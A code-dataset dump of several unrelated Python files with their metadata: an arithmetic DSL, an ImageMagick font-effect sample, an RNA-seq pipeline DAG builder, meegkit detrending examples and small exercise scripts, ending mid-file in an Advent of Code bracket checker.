def apply_single(self, raw_args):
"""See base class."""
left, right = raw_args
return left // right
def tokenized_expression(self, arg_values):
"""See base class."""
left, right = arg_values
return (['('] + left.tokenized_expression() + [' // ']
+ right.tokenized_expression() + [')'])
def get_operations():
return [
AddOperation(),
SubtractOperation(),
MultiplyOperation(),
IntDivideOperation(),
]
| <filename>crossbeam/dsl/arithmetic_operations.py
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Operations for the integer arithmetic DSL."""
from crossbeam.dsl import operation_base
class AddOperation(operation_base.OperationBase):
"""An operation that adds 2 numbers."""
def __init__(self):
super(AddOperation, self).__init__('AddOperation', 2)
def apply_single(self, raw_args):
"""See base class."""
left, right = raw_args
return left + right
def tokenized_expression(self, arg_values):
"""See base class."""
left, right = arg_values
return (['('] + left.tokenized_expression() + [' + ']
+ right.tokenized_expression() + [')'])
class SubtractOperation(operation_base.OperationBase):
"""An operation that subtracts 2 numbers."""
def __init__(self):
super(SubtractOperation, self).__init__('SubtractOperation', 2)
def apply_single(self, raw_args):
"""See base class."""
left, right = raw_args
return left - right
def tokenized_expression(self, arg_values):
"""See base class."""
left, right = arg_values
return (['('] + left.tokenized_expression() + [' - ']
+ right.tokenized_expression() + [')'])
class MultiplyOperation(operation_base.OperationBase):
"""An operation that multiplies 2 numbers."""
def __init__(self):
super(MultiplyOperation, self).__init__('MultiplyOperation', 2)
def apply_single(self, raw_args):
"""See base class."""
left, right = raw_args
return left * right
def tokenized_expression(self, arg_values):
"""See base class."""
left, right = arg_values
return (['('] + left.tokenized_expression() + [' * ']
+ right.tokenized_expression() + [')'])
class IntDivideOperation(operation_base.OperationBase):
"""An operation that divides 2 integers."""
def __init__(self):
super(IntDivideOperation, self).__init__('IntDivideOperation', 2)
def apply_single(self, raw_args):
"""See base class."""
left, right = raw_args
return left // right
def tokenized_expression(self, arg_values):
"""See base class."""
left, right = arg_values
return (['('] + left.tokenized_expression() + [' // ']
+ right.tokenized_expression() + [')'])
def get_operations():
return [
AddOperation(),
SubtractOperation(),
MultiplyOperation(),
IntDivideOperation(),
]
| en | 0.827575 | # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Operations for the integer arithmetic DSL. An operation that adds 2 numbers. See base class. See base class. An operation that subtracts 2 numbers. See base class. See base class. An operation that multiplies 2 numbers. See base class. See base class. An operation that divides 2 integers. See base class. See base class. | 2.670984 | 3 |
examples/fonteffects/sample36_comet.py | chromia/wandplus | 0 | 6632514 | #!/usr/bin/env python
from wand.image import Image
from wand.drawing import Drawing
from wand.color import Color
from wandplus.image import motionblur
# http://www.imagemagick.org/Usage/fonts/
# original imagemagick command:
# convert -size 340x120 xc:lightblue -font Candice -pointsize 72 \
# -fill navy -annotate +45+95 'Anthony' -motion-blur 0x25+65 \
# -fill black -annotate +45+95 'Anthony' -motion-blur 0x1+65 \
# font_comet.jpg
w = 340
h = 120
bgcolor = Color('lightblue')
with Image(width=w, height=h, background=bgcolor) as img:
with Drawing() as draw:
text = 'Anthony'
draw.font = 'Candice'
draw.font_size = 72
draw.gravity = 'forget'
x = 45
y = 95
draw.fill_color = Color('navy')
draw.text(x, y, text)
draw(img)
motionblur(img, 0, 25, 65)
draw.fill_color = Color('black')
draw.text(x, y, text)
draw(img)
motionblur(img, 0, 1, 65)
img.save(filename='sample36.png')
| #!/usr/bin/env python
from wand.image import Image
from wand.drawing import Drawing
from wand.color import Color
from wandplus.image import motionblur
# http://www.imagemagick.org/Usage/fonts/
# original imagemagick command:
# convert -size 340x120 xc:lightblue -font Candice -pointsize 72 \
# -fill navy -annotate +45+95 'Anthony' -motion-blur 0x25+65 \
# -fill black -annotate +45+95 'Anthony' -motion-blur 0x1+65 \
# font_comet.jpg
w = 340
h = 120
bgcolor = Color('lightblue')
with Image(width=w, height=h, background=bgcolor) as img:
with Drawing() as draw:
text = 'Anthony'
draw.font = 'Candice'
draw.font_size = 72
draw.gravity = 'forget'
x = 45
y = 95
draw.fill_color = Color('navy')
draw.text(x, y, text)
draw(img)
motionblur(img, 0, 25, 65)
draw.fill_color = Color('black')
draw.text(x, y, text)
draw(img)
motionblur(img, 0, 1, 65)
img.save(filename='sample36.png')
| en | 0.101383 | #!/usr/bin/env python # http://www.imagemagick.org/Usage/fonts/ # original imagemagick command: # convert -size 340x120 xc:lightblue -font Candice -pointsize 72 \ # -fill navy -annotate +45+95 'Anthony' -motion-blur 0x25+65 \ # -fill black -annotate +45+95 'Anthony' -motion-blur 0x1+65 \ # font_comet.jpg | 2.652598 | 3 |
woldrnaseq/make_star_rsem_dag.py | detrout/woldlab-rna-seq | 2 | 6632515 | """STAR & RSEM based RNA-Seq pipeline.
"""
from __future__ import absolute_import, print_function
from argparse import ArgumentParser
import datetime
import getpass
import itertools
import logging
import os
from pathlib import Path
from pkg_resources import resource_filename
import stat
from jinja2 import Environment, PackageLoader
import woldrnaseq
from woldrnaseq import __version__
from .common import (
add_default_path_arguments,
add_debug_arguments,
add_version_argument,
configure_logging,
)
logger = logging.getLogger(__name__)
def main(cmdline=None):
parser = make_parser()
args = parser.parse_args(cmdline)
configure_logging(args)
analysis = AnalysisDAG()
analysis.genome_dir = args.genome_dir
analysis.star_dir = args.star_dir
analysis.rsem_dir = args.rsem_dir
analysis.georgi_dir = args.georgi_dir
analysis.ucsc_tools_dir = args.ucsc_tools_dir
analysis.genome = args.genome
analysis.annotation = args.annotation
analysis.sex = args.sex
analysis.job_id = args.library_id
analysis.analysis_dir = args.analysis_dir
analysis.analysis_name = args.analysis_name
analysis.read_1_fastqs = args.read1
analysis.read_2_fastqs = args.read2
analysis.splice_template = args.splice_template
if analysis.is_valid():
print(str(analysis))
def make_parser():
parser = ArgumentParser()
parser.add_argument('-g', '--genome')
parser.add_argument('-a', '--annotation')
parser.add_argument('-s', '--sex')
parser.add_argument('-l', '--library-id')
parser.add_argument('--analysis-dir', help='target dir to store analysis')
parser.add_argument('--analysis-name', help='name to store analysis')
parser.add_argument('--read1', nargs='+', help='path to read 1 fastqs')
parser.add_argument('--read2', nargs='*', default=[],
help='path to read 2 fastqs')
parser.add_argument('--splice-template', default='star_rsem.dagman',
help='Override splice dagman template')
add_default_path_arguments(parser)
add_version_argument(parser)
add_debug_arguments(parser)
return parser
class AnalysisDAG:
def __init__(self):
self.genome_dir = None
self.star_dir = None
self.rsem_dir = None
self.georgi_dir = None
self.ucsc_tools_dir = None
self.job_id = None
self.genome = None
self.annotation = None
self.sex = None
self.analysis_dir = None
self._analysis_name = None
self.read_1_fastqs = []
self.read_2_fastqs = []
self.stranded = 'unstranded'
self.reference_prefix = 'chr'
self.splice_template = 'star_rsem.dagman'
@property
def fastq_size(self):
filesize = 0
for filename in itertools.chain(self.read_1_fastqs, self.read_2_fastqs):
filesize += os.stat(filename)[stat.ST_SIZE]
return filesize
@property
def star_index_size(self):
genome_dir = Path(self.genome_dir)
sa_name = genome_dir / self.genome_triplet / "SA"
filesize = os.stat(sa_name)[stat.ST_SIZE]
return filesize
@property
def star_memory_size(self):
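        # Rough RAM estimate: the whole STAR suffix-array index plus about 3x the
        # combined FASTQ size, presumably as headroom for STAR's own buffers.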
return self.fastq_size * 3 + self.star_index_size
@property
def genome_triplet(self):
return "-".join((self.genome, self.annotation, self.sex))
def is_valid(self):
for key in self.__dict__:
if key == 'read_1_fastqs' and len(self.read_1_fastqs) == 0:
raise ValueError("Read 1 fastqs are required for library {}".format(self.job_id))
elif key == '_analysis_name':
# analysis name will default to analysis dir
pass
elif key == 'analysis_dir':
if self.analysis_dir is None:
raise ValueError("analysis_dir is not set")
if not os.path.exists(self.analysis_dir):
logger.warning("Analysis dir %s doesn't exist", self.analysis_dir)
elif getattr(self, key) is None:
raise ValueError("{} is not set".format(key))
return True
@property
def analysis_name(self):
if self._analysis_name is not None:
return self._analysis_name
if self.analysis_dir is not None:
self._analysis_name = os.path.basename(self.analysis_dir)
return self._analysis_name
@analysis_name.setter
def analysis_name(self, value):
self._analysis_name = value
def __str__(self):
env = Environment(loader=PackageLoader('woldrnaseq', 'templates'))
template = env.get_template(self.splice_template)
rsem_paired_argument = '--paired-end' if len(self.read_2_fastqs) > 0 else ''
if self.stranded == 'forward':
rsem_strand_probability = '--forward-prob 1'
elif self.stranded == 'reverse':
rsem_strand_probability = '--forward-prob 0'
else:
rsem_strand_probability = '--forward-prob 0.5'
if self.stranded == "unstranded":
bam2bigwig = resource_filename(__name__, 'bam2bigwig_unstranded.condor')
else:
bam2bigwig = resource_filename(__name__, 'bam2bigwig_stranded.condor')
return template.render(
align_star=resource_filename(__name__, 'align-star.condor'),
pre_star=resource_filename(__name__, 'pre_star'),
post_star=resource_filename(__name__, 'post_star'),
sort_samtools=resource_filename(__name__, 'sort-samtools.condor'),
quant_rsem=resource_filename(__name__, 'quant-rsem.condor'),
index_samtools=resource_filename(__name__, 'index-samtools.condor'),
qc_samstats=resource_filename(__name__, 'qc-samstats.condor'),
bedgraph_star=resource_filename(__name__, 'bedgraph-star.condor'),
qc_coverage=resource_filename(__name__, 'qc-coverage.condor'),
qc_distribution=resource_filename(__name__, 'qc-distribution.condor'),
bam2bigwig=bam2bigwig,
sort_samtools_sh=resource_filename(__name__, 'sort-samtools.sh'),
bedgraph_bedsort_sh=resource_filename(__name__, 'bedsort.sh'),
picard_markdup=resource_filename(__name__, 'picard-markdup.condor'),
picard_multi_metrics=resource_filename(__name__, 'picard-multi-metrics.condor'),
rrna_premap=resource_filename(__name__, 'rrna-premap.condor'),
rrna_premap_sh=resource_filename(__name__, 'rrna-premap.sh'),
genome_dir=self.genome_dir,
star_dir=self.star_dir,
rsem_dir=self.rsem_dir,
georgi_dir=self.georgi_dir,
ucsc_tools_dir=self.ucsc_tools_dir,
job_id=self.job_id,
genome=self.genome,
annotation=self.annotation,
sex=self.sex,
analysis_dir=self.analysis_dir,
analysis_name=self.analysis_name,
read_1_fastqs=",".join(self.read_1_fastqs),
read_2_fastqs=",".join(self.read_2_fastqs),
star_request_memory_megabytes=int(self.star_memory_size / (2 ** 20)),
star_request_memory_bytes=int(self.star_memory_size),
star_request_disk_kilobytes=int(self.fastq_size/1024 * 4),
reference_prefix=self.reference_prefix,
rsem_paired_argument=rsem_paired_argument,
rsem_strand_probability=rsem_strand_probability,
rsem_request_disk=int(self.fastq_size/1024 * 7),
pythonpath=Path(woldrnaseq.__path__[0]).parent,
username=getpass.getuser(),
timestamp=datetime.datetime.now().isoformat(),
woldrnaseq_version=__version__,
)
if __name__ == "__main__":
main()
| """STAR & RSEM based RNA-Seq pipeline.
"""
from __future__ import absolute_import, print_function
from argparse import ArgumentParser
import datetime
import getpass
import itertools
import logging
import os
from pathlib import Path
from pkg_resources import resource_filename
import stat
from jinja2 import Environment, PackageLoader
import woldrnaseq
from woldrnaseq import __version__
from .common import (
add_default_path_arguments,
add_debug_arguments,
add_version_argument,
configure_logging,
)
logger = logging.getLogger(__name__)
def main(cmdline=None):
parser = make_parser()
args = parser.parse_args(cmdline)
configure_logging(args)
analysis = AnalysisDAG()
analysis.genome_dir = args.genome_dir
analysis.star_dir = args.star_dir
analysis.rsem_dir = args.rsem_dir
analysis.georgi_dir = args.georgi_dir
analysis.ucsc_tools_dir = args.ucsc_tools_dir
analysis.genome = args.genome
analysis.annotation = args.annotation
analysis.sex = args.sex
analysis.job_id = args.library_id
analysis.analysis_dir = args.analysis_dir
analysis.analysis_name = args.analysis_name
analysis.read_1_fastqs = args.read1
analysis.read_2_fastqs = args.read2
analysis.splice_template = args.splice_template
if analysis.is_valid():
print(str(analysis))
def make_parser():
parser = ArgumentParser()
parser.add_argument('-g', '--genome')
parser.add_argument('-a', '--annotation')
parser.add_argument('-s', '--sex')
parser.add_argument('-l', '--library-id')
parser.add_argument('--analysis-dir', help='target dir to store analysis')
parser.add_argument('--analysis-name', help='name to store analysis')
parser.add_argument('--read1', nargs='+', help='path to read 1 fastqs')
parser.add_argument('--read2', nargs='*', default=[],
help='path to read 2 fastqs')
parser.add_argument('--splice-template', default='star_rsem.dagman',
help='Override splice dagman template')
add_default_path_arguments(parser)
add_version_argument(parser)
add_debug_arguments(parser)
return parser
class AnalysisDAG:
def __init__(self):
self.genome_dir = None
self.star_dir = None
self.rsem_dir = None
self.georgi_dir = None
self.ucsc_tools_dir = None
self.job_id = None
self.genome = None
self.annotation = None
self.sex = None
self.analysis_dir = None
self._analysis_name = None
self.read_1_fastqs = []
self.read_2_fastqs = []
self.stranded = 'unstranded'
self.reference_prefix = 'chr'
self.splice_template = 'star_rsem.dagman'
@property
def fastq_size(self):
filesize = 0
for filename in itertools.chain(self.read_1_fastqs, self.read_2_fastqs):
filesize += os.stat(filename)[stat.ST_SIZE]
return filesize
@property
def star_index_size(self):
genome_dir = Path(self.genome_dir)
sa_name = genome_dir / self.genome_triplet / "SA"
filesize = os.stat(sa_name)[stat.ST_SIZE]
return filesize
@property
def star_memory_size(self):
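        # Rough RAM estimate: the whole STAR suffix-array index plus about 3x the
        # combined FASTQ size, presumably as headroom for STAR's own buffers.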
return self.fastq_size * 3 + self.star_index_size
@property
def genome_triplet(self):
return "-".join((self.genome, self.annotation, self.sex))
def is_valid(self):
for key in self.__dict__:
if key == 'read_1_fastqs' and len(self.read_1_fastqs) == 0:
raise ValueError("Read 1 fastqs are required for library {}".format(self.job_id))
elif key == '_analysis_name':
# analysis name will default to analysis dir
pass
elif key == 'analysis_dir':
if self.analysis_dir is None:
raise ValueError("analysis_dir is not set")
if not os.path.exists(self.analysis_dir):
logger.warning("Analysis dir %s doesn't exist", self.analysis_dir)
elif getattr(self, key) is None:
raise ValueError("{} is not set".format(key))
return True
@property
def analysis_name(self):
if self._analysis_name is not None:
return self._analysis_name
if self.analysis_dir is not None:
self._analysis_name = os.path.basename(self.analysis_dir)
return self._analysis_name
@analysis_name.setter
def analysis_name(self, value):
self._analysis_name = value
def __str__(self):
env = Environment(loader=PackageLoader('woldrnaseq', 'templates'))
template = env.get_template(self.splice_template)
rsem_paired_argument = '--paired-end' if len(self.read_2_fastqs) > 0 else ''
if self.stranded == 'forward':
rsem_strand_probability = '--forward-prob 1'
elif self.stranded == 'reverse':
rsem_strand_probability = '--forward-prob 0'
else:
rsem_strand_probability = '--forward-prob 0.5'
if self.stranded == "unstranded":
bam2bigwig = resource_filename(__name__, 'bam2bigwig_unstranded.condor')
else:
bam2bigwig = resource_filename(__name__, 'bam2bigwig_stranded.condor')
return template.render(
align_star=resource_filename(__name__, 'align-star.condor'),
pre_star=resource_filename(__name__, 'pre_star'),
post_star=resource_filename(__name__, 'post_star'),
sort_samtools=resource_filename(__name__, 'sort-samtools.condor'),
quant_rsem=resource_filename(__name__, 'quant-rsem.condor'),
index_samtools=resource_filename(__name__, 'index-samtools.condor'),
qc_samstats=resource_filename(__name__, 'qc-samstats.condor'),
bedgraph_star=resource_filename(__name__, 'bedgraph-star.condor'),
qc_coverage=resource_filename(__name__, 'qc-coverage.condor'),
qc_distribution=resource_filename(__name__, 'qc-distribution.condor'),
bam2bigwig=bam2bigwig,
sort_samtools_sh=resource_filename(__name__, 'sort-samtools.sh'),
bedgraph_bedsort_sh=resource_filename(__name__, 'bedsort.sh'),
picard_markdup=resource_filename(__name__, 'picard-markdup.condor'),
picard_multi_metrics=resource_filename(__name__, 'picard-multi-metrics.condor'),
rrna_premap=resource_filename(__name__, 'rrna-premap.condor'),
rrna_premap_sh=resource_filename(__name__, 'rrna-premap.sh'),
genome_dir=self.genome_dir,
star_dir=self.star_dir,
rsem_dir=self.rsem_dir,
georgi_dir=self.georgi_dir,
ucsc_tools_dir=self.ucsc_tools_dir,
job_id=self.job_id,
genome=self.genome,
annotation=self.annotation,
sex=self.sex,
analysis_dir=self.analysis_dir,
analysis_name=self.analysis_name,
read_1_fastqs=",".join(self.read_1_fastqs),
read_2_fastqs=",".join(self.read_2_fastqs),
star_request_memory_megabytes=int(self.star_memory_size / (2 ** 20)),
star_request_memory_bytes=int(self.star_memory_size),
star_request_disk_kilobytes=int(self.fastq_size/1024 * 4),
reference_prefix=self.reference_prefix,
rsem_paired_argument=rsem_paired_argument,
rsem_strand_probability=rsem_strand_probability,
rsem_request_disk=int(self.fastq_size/1024 * 7),
pythonpath=Path(woldrnaseq.__path__[0]).parent,
username=getpass.getuser(),
timestamp=datetime.datetime.now().isoformat(),
woldrnaseq_version=__version__,
)
if __name__ == "__main__":
main()
| en | 0.750548 | STAR & RSEM based RNA-Seq pipeline. # analysis name will default to analysis dir | 2.26522 | 2 |
query_result.py | Berdugo1994/Tweeter-Search-Engine | 0 | 6632516 | <reponame>Berdugo1994/Tweeter-Search-Engine
class QueryResult:
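    """One ranked retrieval result: a tweet id, its similarity score, and the tweet's full text."""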
def __init__(self,
tweet_id,
similarity,
full_text):
self.tweet_id = tweet_id
self.similarity = similarity
self.full_text = full_text
def __str__(self):
# return ", Tweet id: " + self.tweet_id + ", Score: " + str(self.similarity)
return self.full_text + ", Tweet id: " + self.tweet_id + ", Score: " + str(self.similarity) | class QueryResult:
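    """One ranked retrieval result: a tweet id, its similarity score, and the tweet's full text."""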
def __init__(self,
tweet_id,
similarity,
full_text):
self.tweet_id = tweet_id
self.similarity = similarity
self.full_text = full_text
def __str__(self):
# return ", Tweet id: " + self.tweet_id + ", Score: " + str(self.similarity)
return self.full_text + ", Tweet id: " + self.tweet_id + ", Score: " + str(self.similarity) | en | 0.191254 | # return ", Tweet id: " + self.tweet_id + ", Score: " + str(self.similarity) | 2.844301 | 3 |
average.py | subho781/MCA-Python-Assignment | 0 | 6632517 | <reponame>subho781/MCA-Python-Assignment<filename>average.py
s1 = float(input('enter marks : '))
s2 = float(input('enter marks : '))
aggregate = (s1+s2)/2
print('aggregate :',aggregate)
| s1 = float(input('enter marks : '))
s2 = float(input('enter marks : '))
aggregate = (s1+s2)/2
print('aggregate :',aggregate) | none | 1 | 3.765894 | 4 |
|
examples/example_detrend.py | nbara/python-meegk | 80 | 6632518 | """
Robust detrending examples
==========================
Some toy examples to showcase usage for ``meegkit.detrend`` module.
Robust referencing is adapted from [1].
References
----------
> [1] <NAME>., & <NAME>. (2018). Robust detrending,
rereferencing, outlier detection, and inpainting for multichannel data.
NeuroImage, 172, 903-912.
"""
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.gridspec import GridSpec
from meegkit.detrend import regress, detrend
# import config # plotting utils
np.random.seed(9)
###############################################################################
# Regression
# =============================================================================
###############################################################################
# Simple regression example, no weights
# -----------------------------------------------------------------------------
# We first try to fit a simple random walk process.
x = np.cumsum(np.random.randn(1000, 1), axis=0)
r = np.arange(1000.)[:, None]
r = np.hstack([r, r ** 2, r ** 3])
b, y = regress(x, r)
plt.figure(1)
plt.plot(x, label='data')
plt.plot(y, label='fit')
plt.title('No weights')
plt.legend()
plt.show()
###############################################################################
# Downweight 1st half of the data
# -----------------------------------------------------------------------------
# We can also use weights for each time sample. Here we explicitly restrict the
# fit to the second half of the data by setting weights to zero for the first
# 500 samples.
x = np.cumsum(np.random.randn(1000, 1), axis=0) + 1000
w = np.ones(y.shape[0])
w[:500] = 0
b, y = regress(x, r, w)
f = plt.figure(3)
gs = GridSpec(4, 1, figure=f)
ax1 = f.add_subplot(gs[:3, 0])
ax1.plot(x, label='data')
ax1.plot(y, label='fit')
ax1.set_xticklabels('')
ax1.set_title('Split-wise regression')
ax1.legend()
ax2 = f.add_subplot(gs[3, 0])
l, = ax2.plot(np.arange(1000), np.zeros(1000))
ax2.stackplot(np.arange(1000), w, labels=['weights'], color=l.get_color())
ax2.legend(loc=2)
###############################################################################
# Multichannel regression
# -----------------------------------------------------------------------------
x = np.cumsum(np.random.randn(1000, 2), axis=0)
w = np.ones(y.shape[0])
b, y = regress(x, r, w)
plt.figure(4)
plt.plot(x, label='data', color='C0')
plt.plot(y, ls=':', label='fit', color='C1')
plt.title('Channel-wise regression')
plt.legend()
###############################################################################
# Detrending
# =============================================================================
###############################################################################
# Basic example with a linear trend
# -----------------------------------------------------------------------------
x = np.arange(100)[:, None]
x = x + np.random.randn(*x.shape)
y, _, _ = detrend(x, 1)
plt.figure(5)
plt.plot(x, label='original')
plt.plot(y, label='detrended')
plt.legend()
###############################################################################
# Detrend biased random walk with a third-order polynomial
# -----------------------------------------------------------------------------
x = np.cumsum(np.random.randn(1000, 1) + 0.1)
y, _, _ = detrend(x, 3)
plt.figure(6)
plt.plot(x, label='original')
plt.plot(y, label='detrended')
plt.legend()
###############################################################################
# Detrend with weights
# -----------------------------------------------------------------------------
# Finally, we show how the detrending process handles local artifacts, and how
# we can advantageously use weights to improve detrending. The raw data
# consists of gaussian noise with a linear trend, and a storng glitch covering
# the first 100 timesamples (blue trace). Detrending without weights (orange
# trace) causes an overestimation of the polynomial order because of the
# glitch, leading to a mediocre fit. When downweightining this artifactual
# period, the fit is much improved (green trace).
x = np.linspace(0, 100, 1000)[:, None]
x = x + 3 * np.random.randn(*x.shape)
# introduce some strong artifact on the first 100 samples
x[:100, :] = 100
# Detrend
y, _, _ = detrend(x, 3, None, threshold=np.inf)
# Same process but this time downweight artifactual window
w = np.ones(x.shape)
w[:100, :] = 0
z, _, _ = detrend(x, 3, w)
plt.figure(7)
plt.plot(x, label='original')
plt.plot(y, label='detrended - no weights')
plt.plot(z, label='detrended - weights')
plt.legend()
plt.show()
| """
Robust detrending examples
==========================
Some toy examples to showcase usage for ``meegkit.detrend`` module.
Robust referencing is adapted from [1].
References
----------
> [1] <NAME>., & <NAME>. (2018). Robust detrending,
rereferencing, outlier detection, and inpainting for multichannel data.
NeuroImage, 172, 903-912.
"""
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.gridspec import GridSpec
from meegkit.detrend import regress, detrend
# import config # plotting utils
np.random.seed(9)
###############################################################################
# Regression
# =============================================================================
###############################################################################
# Simple regression example, no weights
# -----------------------------------------------------------------------------
# We first try to fit a simple random walk process.
x = np.cumsum(np.random.randn(1000, 1), axis=0)
r = np.arange(1000.)[:, None]
r = np.hstack([r, r ** 2, r ** 3])
b, y = regress(x, r)
plt.figure(1)
plt.plot(x, label='data')
plt.plot(y, label='fit')
plt.title('No weights')
plt.legend()
plt.show()
###############################################################################
# Downweight 1st half of the data
# -----------------------------------------------------------------------------
# We can also use weights for each time sample. Here we explicitly restrict the
# fit to the second half of the data by setting weights to zero for the first
# 500 samples.
x = np.cumsum(np.random.randn(1000, 1), axis=0) + 1000
w = np.ones(y.shape[0])
w[:500] = 0
b, y = regress(x, r, w)
f = plt.figure(3)
gs = GridSpec(4, 1, figure=f)
ax1 = f.add_subplot(gs[:3, 0])
ax1.plot(x, label='data')
ax1.plot(y, label='fit')
ax1.set_xticklabels('')
ax1.set_title('Split-wise regression')
ax1.legend()
ax2 = f.add_subplot(gs[3, 0])
l, = ax2.plot(np.arange(1000), np.zeros(1000))
ax2.stackplot(np.arange(1000), w, labels=['weights'], color=l.get_color())
ax2.legend(loc=2)
###############################################################################
# Multichannel regression
# -----------------------------------------------------------------------------
x = np.cumsum(np.random.randn(1000, 2), axis=0)
w = np.ones(y.shape[0])
b, y = regress(x, r, w)
plt.figure(4)
plt.plot(x, label='data', color='C0')
plt.plot(y, ls=':', label='fit', color='C1')
plt.title('Channel-wise regression')
plt.legend()
###############################################################################
# Detrending
# =============================================================================
###############################################################################
# Basic example with a linear trend
# -----------------------------------------------------------------------------
x = np.arange(100)[:, None]
x = x + np.random.randn(*x.shape)
y, _, _ = detrend(x, 1)
plt.figure(5)
plt.plot(x, label='original')
plt.plot(y, label='detrended')
plt.legend()
###############################################################################
# Detrend biased random walk with a third-order polynomial
# -----------------------------------------------------------------------------
x = np.cumsum(np.random.randn(1000, 1) + 0.1)
y, _, _ = detrend(x, 3)
plt.figure(6)
plt.plot(x, label='original')
plt.plot(y, label='detrended')
plt.legend()
###############################################################################
# Detrend with weights
# -----------------------------------------------------------------------------
# Finally, we show how the detrending process handles local artifacts, and how
# we can advantageously use weights to improve detrending. The raw data
# consists of gaussian noise with a linear trend, and a storng glitch covering
# the first 100 timesamples (blue trace). Detrending without weights (orange
# trace) causes an overestimation of the polynomial order because of the
# glitch, leading to a mediocre fit. When downweightining this artifactual
# period, the fit is much improved (green trace).
x = np.linspace(0, 100, 1000)[:, None]
x = x + 3 * np.random.randn(*x.shape)
# introduce some strong artifact on the first 100 samples
x[:100, :] = 100
# Detrend
y, _, _ = detrend(x, 3, None, threshold=np.inf)
# Same process but this time downweight artifactual window
w = np.ones(x.shape)
w[:100, :] = 0
z, _, _ = detrend(x, 3, w)
plt.figure(7)
plt.plot(x, label='original')
plt.plot(y, label='detrended - no weights')
plt.plot(z, label='detrended - weights')
plt.legend()
plt.show()
| en | 0.397905 | Robust detrending examples ========================== Some toy examples to showcase usage for ``meegkit.detrend`` module. Robust referencing is adapted from [1]. References ---------- > [1] <NAME>., & <NAME>. (2018). Robust detrending, rereferencing, outlier detection, and inpainting for multichannel data. NeuroImage, 172, 903-912. # import config # plotting utils ############################################################################### # Regression # ============================================================================= ############################################################################### # Simple regression example, no weights # ----------------------------------------------------------------------------- # We first try to fit a simple random walk process. ############################################################################### # Downweight 1st half of the data # ----------------------------------------------------------------------------- # We can also use weights for each time sample. Here we explicitly restrict the # fit to the second half of the data by setting weights to zero for the first # 500 samples. ############################################################################### # Multichannel regression # ----------------------------------------------------------------------------- ############################################################################### # Detrending # ============================================================================= ############################################################################### # Basic example with a linear trend # ----------------------------------------------------------------------------- ############################################################################### # Detrend biased random walk with a third-order polynomial # ----------------------------------------------------------------------------- ############################################################################### # Detrend with weights # ----------------------------------------------------------------------------- # Finally, we show how the detrending process handles local artifacts, and how # we can advantageously use weights to improve detrending. The raw data # consists of gaussian noise with a linear trend, and a storng glitch covering # the first 100 timesamples (blue trace). Detrending without weights (orange # trace) causes an overestimation of the polynomial order because of the # glitch, leading to a mediocre fit. When downweightining this artifactual # period, the fit is much improved (green trace). # introduce some strong artifact on the first 100 samples # Detrend # Same process but this time downweight artifactual window | 2.426304 | 2 |
publications/2022TPAMI/experiment-controller/python/singularity/resourcetest.py | fmohr/llcv | 3 | 6632519 | import json
import ConfigSpace
from ConfigSpace.util import *
from ConfigSpace.read_and_write import json as config_json
import random
from commons import *
import numpy as np
import matplotlib.pyplot as plt
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import RobustScaler
from sklearn.decomposition import FastICA
from sklearn.neural_network import MLPClassifier
import os
print(os.environ["OMP_NUM_THREADS"])
print(os.environ["MKL_NUM_THREADS"])
print(os.environ["OPENBLAS_NUM_THREADS"])
print(os.environ["BLIS_NUM_THREADS"])
#X, y = get_dataset(1485)
X, y = get_dataset(1485)
y = y.to_numpy()
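# The loop below stacks the data onto itself six times (64x the original rows),
# presumably to stress memory use under the BLAS thread limits printed above.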
for i in range(6):
print(X.shape)
print(y.shape)
X = np.row_stack([X, X])
y = np.row_stack([y.reshape(len(y), 1), y.reshape(len(y), 1)])
print(X.shape, y.shape)
pl = Pipeline(steps=[('predictor', MLPClassifier())])
pl.fit(X, y) | import json
import ConfigSpace
from ConfigSpace.util import *
from ConfigSpace.read_and_write import json as config_json
import random
from commons import *
import numpy as np
import matplotlib.pyplot as plt
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import RobustScaler
from sklearn.decomposition import FastICA
from sklearn.neural_network import MLPClassifier
import os
print(os.environ["OMP_NUM_THREADS"])
print(os.environ["MKL_NUM_THREADS"])
print(os.environ["OPENBLAS_NUM_THREADS"])
print(os.environ["BLIS_NUM_THREADS"])
#X, y = get_dataset(1485)
X, y = get_dataset(1485)
y = y.to_numpy()
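# The loop below stacks the data onto itself six times (64x the original rows),
# presumably to stress memory use under the BLAS thread limits printed above.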
for i in range(6):
print(X.shape)
print(y.shape)
X = np.row_stack([X, X])
y = np.row_stack([y.reshape(len(y), 1), y.reshape(len(y), 1)])
print(X.shape, y.shape)
pl = Pipeline(steps=[('predictor', MLPClassifier())])
pl.fit(X, y) | es | 0.25872 | #X, y = get_dataset(1485) | 2.179228 | 2 |
d10/part1.py | Jamie-Chang/advent2021 | 0 | 6632520 | <filename>d10/part1.py
from typing import Final, Iterable, Iterator
CLOSER: Final[dict[str, str]] = {
"{": "}",
"(": ")",
"<": ">",
"[": "]",
}
SCORES: Final[dict[str, int]] = {
")": 3,
"]": 57,
"}": 1197,
">": 25137,
}
def read() -> Iterator[str]:
with open("d10/input.txt") as f:
for line in f:
yield line.strip()
def check(line: str) -> str | None:
"""
>>> check("()")
>>> check("(]")
']'
>>> check("(")
>>> check("]")
']'
"""
stack = []
for c in line:
match c, stack:
case ("{", _) | ("(", _) | ("<", _) | ("[", _):
stack.append(c)
case c, []:
return c
case c, [*_, opener] if c != CLOSER[opener]:
return c
case c, [*_, opener] if c == CLOSER[opener]:
stack.pop()
return None
def get_scores(lines: Iterable[str]) -> Iterator[int]:
for line in lines:
character = check(line)
if character is None:
continue
yield SCORES[character]
if __name__ == "__main__":
print(sum(get_scores(read())))
| <filename>d10/part1.py
from typing import Final, Iterable, Iterator
CLOSER: Final[dict[str, str]] = {
"{": "}",
"(": ")",
"<": ">",
"[": "]",
}
SCORES: Final[dict[str, int]] = {
